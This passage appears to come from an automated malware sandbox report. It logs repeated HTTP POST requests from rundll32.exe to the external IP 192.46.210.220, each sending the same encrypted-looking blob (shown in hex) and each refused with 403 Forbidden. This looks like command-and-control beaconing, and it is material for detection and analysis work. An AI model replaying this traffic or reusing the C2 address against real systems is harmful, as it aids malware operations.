                                                                                                        2021-10-28 02:59:46 UTC259OUTData Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:59:47 UTC269INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:59:46 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        53192.168.2.650017192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:59:46 UTC264OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4850
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:59:46 UTC264OUTData Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:59:47 UTC269INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:59:47 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        54192.168.2.650025192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:59:50 UTC269OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4862
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:59:50 UTC269OUTData Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:59:50 UTC279INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:59:50 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        55192.168.2.650024192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:59:50 UTC274OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4850
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:59:50 UTC274OUTData Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:59:51 UTC279INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:59:50 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        56192.168.2.650032192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:59:54 UTC279OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4850
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:59:54 UTC279OUTData Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:59:54 UTC289INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:59:54 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        57192.168.2.650033192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:59:54 UTC284OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4862
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:59:54 UTC284OUTData Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:59:54 UTC289INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:59:54 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        58192.168.2.650052192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:59:57 UTC289OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4850
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:59:57 UTC289OUTData Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:59:58 UTC299INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:59:58 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        59192.168.2.650053192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:59:58 UTC294OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4862
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:59:58 UTC294OUTData Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:59:58 UTC299INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:59:58 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        6192.168.2.649775192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:58:12 UTC29OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4862
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:58:12 UTC30OUTData Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:58:13 UTC34INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:58:13 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        60192.168.2.650072192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:00:01 UTC299OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4850
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:00:01 UTC299OUTData Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:00:02 UTC309INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:00:02 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        61192.168.2.650073192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:00:02 UTC304OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4862
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:00:02 UTC304OUTData Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:00:02 UTC309INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:00:02 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        62192.168.2.650080192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:00:06 UTC309OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4850
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:00:06 UTC309OUTData Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:00:06 UTC314INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:00:06 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        63192.168.2.650081192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:00:06 UTC314OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4862
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:00:06 UTC314OUTData Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:00:07 UTC319INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:00:07 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        64192.168.2.650087192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:00:10 UTC319OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4850
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
